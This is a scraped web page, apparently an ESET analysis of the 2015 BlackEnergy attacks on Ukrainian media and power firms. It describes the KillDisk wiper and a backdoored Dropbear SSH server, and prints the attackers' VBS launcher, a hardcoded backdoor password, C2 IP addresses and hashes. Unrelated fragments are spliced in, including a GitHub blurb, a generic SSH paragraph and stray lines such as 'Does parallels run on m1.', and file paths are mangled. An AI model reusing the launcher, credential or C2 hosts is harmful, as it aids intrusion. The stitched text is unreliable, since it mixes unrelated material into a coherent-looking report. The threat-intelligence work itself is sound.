Tools, notes and.dot files. Contribute to bear/bear development by creating an account on GitHub. SSH is a network application protocol, most often used for remote control of the operating system. Using this protocol, the tunneling of TCP connections is created. An SSH Protocol encrypts all traffic, including passwords. It Uses various encryption algorithms to do so. SSH servers and SSH clients exist under any OS and are widely distributed.
The cybercriminal group behind BlackEnergy, the malware family that has been around since 2007 and has made a comeback in 2014, was also active in the year 2015.
Update: In case you want to have a more simplified version of this article, please check out BlackEnergy trojan strikes again: Attacks Ukrainian electric power industry.
The cybercriminal group behind BlackEnergy, the malware family that has been around since 2007 and has made a comeback in 2014 (see our previous blog posts on Back in BlackEnergy *: 2014 Targeted Attacks in Ukraine and Poland and BlackEnergy PowerPoint Campaigns, as well as our Virus Bulletin talk on the subject), was also active in the year 2015.
ESET has recently discovered that the BlackEnergy trojan was recently used as a backdoor to deliver a destructive KillDisk component in attacks against Ukrainian news media companies and against the electrical power industry. In this blog, we provide details on the BlackEnergy samples ESET has detected in 2015, as well as the KillDisk components used in the attacks. Furthermore, we examine a previously unknown SSH backdoor that was also used as another channel of accessing the infected systems, in addition to BlackEnergy.
We continue to monitor the BlackEnergy malware operations for future developments. For any inquiries or to make sample submissions related to the subject, contact us at: [email protected]
Once activated, variants of BlackEnergy Lite allow a malware operator to check specific criteria in order to assess whether the infected computer truly belongs to the intended target. If that is the case, the dropper of a regular BlackEnergy variant is pushed to the system. The exact mechanism of infection by BlackEnergy is described in our Virus Bulletin presentation and this whitepaper by F-Secure.
The BlackEnergy malware stores XML configuration data embedded in the binary of DLL payload.
Figure 1 – The BlackEnergy configuration example used in 2015
Apart from a list of C&C servers, the BlackEnergy config contains a value called build_id. This value is a unique text string used to identify individual infections or infection attempts by the BlackEnergy malware operators. The combinations of letters and numbers used can sometimes reveal information about the campaign and targets.
Here is the list of Build ID values that we identified in 2015:
2015en
khm10
khelm
2015telsmi
2015ts
2015stb
kiev_o
brd2015
11131526kbp
02260517ee
03150618aaa
11131526trk
We can speculate that some of them have a special meaning. For example 2015telsmi could contain the Russian acronym SMI – Sredstva Massovoj Informacii, 2015en could mean Energy, and there’s also the obvious “Kiev”.
In 2014 some variants of the BlackEnergy trojan contained a plugin designed for the destruction of the infected system, named dstr.
In 2015 the BlackEnergy group started to use a new destructive BlackEnergy component detected by ESET products as Win32/KillDisk.NBB, Win32/KillDisk.NBC and Win32/KillDisk.NBD trojan variants.
The main purpose of this component is to do damage to data stored on the computer: it overwrites documents with random data and makes the OS unbootable.
The first known case where the KillDisk component of BlackEnergy was used was documented by CERT-UA in November 2015. In that instance, a number of news media companies were attacked at the time of the 2015 Ukrainian local elections. The report claims that a large number of video materials and various documents were destroyed as a result of the attack.
It should be noted that the Win32/KillDisk.NBB variant used against media companies is more focused on destroying various types of files and documents. It has a long list of file extensions that it tries to overwrite and delete. The complete list contains more than 4000 file extensions.
Figure 2 – A partial list of file extensions targeted for destruction by KillDisk.NBB
The KillDisk component used in attacks against energy companies in Ukraine was slightly different. Our analysis of the samples shows that the main changes made in the newest version are:
Now it accepts a command line argument, to set a specific time delay when the destructive payload should activate.
It also deletes Windows Event Logs : Application, Security, Setup, System.
It is less focused on deleting documents. Only 35 file extensions are targeted.
Figure 3 – A list of file extensions targeted for destruction by new variant of KillDisk component
As well as being able to delete system files to make the system unbootable – functionality typical for such destructive trojans – the KillDisk variant detected in the electricity distribution companies also appears to contain some additional functionality specifically intended to sabotage industrial systems.
Once activated, this variant of the KillDisk component looks for and terminates two non-standard processes with the following names:
komut.exe
sec_service.exe
We didn’t manage to find any information regarding the name of the first process (komut.exe).
The second process name may belong to software called ASEM Ubiquity, a software platform that is often used in Industrial control systems (ICS), or to ELTIMA Serial to Ethernet Connector. In case the process is found, the malware does not just terminate it, but also overwrites the executable file with random data.
In addition to the malware families already mentioned, we have discovered an interesting sample used by the BlackEnergy group. During our investigation of one of the compromised servers we found an application that, at first glance, appeared to be a legitimate SSH server called Dropbear SSH.
In the order to run the SSH server, the attackers created a VBS file with the following content:
Set WshShell = CreateObject(“WScript.Shell”) WshShell.CurrentDirectory = “C:WINDOWSTEMPDropbear” WshShell.Run “dropbear.exe -r rsa -d dss -a -p 6789”, 0, false
As is evident here, the SSH server will accept connections on port number 6789. By running SSH on the server in a compromised network, attackers can come back to the network whenever they want.
However, for some reason this was not enough for them. After detailed analysis we discovered that the binary of the SSH server actually contains a backdoor.
Figure 4 – Backdoored authentication function in SSH server
As you can see in Figure 4, this version of Dropbear SSH will authenticate the user if the password passDs5Bu9Te7 was entered. The same situation applies to authentication by key pair – the server contains a pre-defined constant public key and it allows authentication only if a particular private key is used.
Figure 5 – The embedded RSA public key in SSH server Does parallels run on m1.
ESET security solutions detect this threat as Win32/SSHBearDoor.A trojan.
IP addresses of BlackEnergy C2-servers: 5.149.254.114 5.9.32.230 31.210.111.154 88.198.25.92 146.0.74.7 188.40.8.72
Gary Ash Bearcom
XLS document with malicious macro SHA-1: AA67CA4FB712374F5301D1D2BAB0AC66107A4DF1
BlackEnergy Lite dropper SHA-1: 4C424D5C8CFEDF8D2164B9F833F7C631F94C5A4C
BlackEnergy Big dropper SHA-1: 896FCACFF6310BBE5335677E99E4C3D370F73D96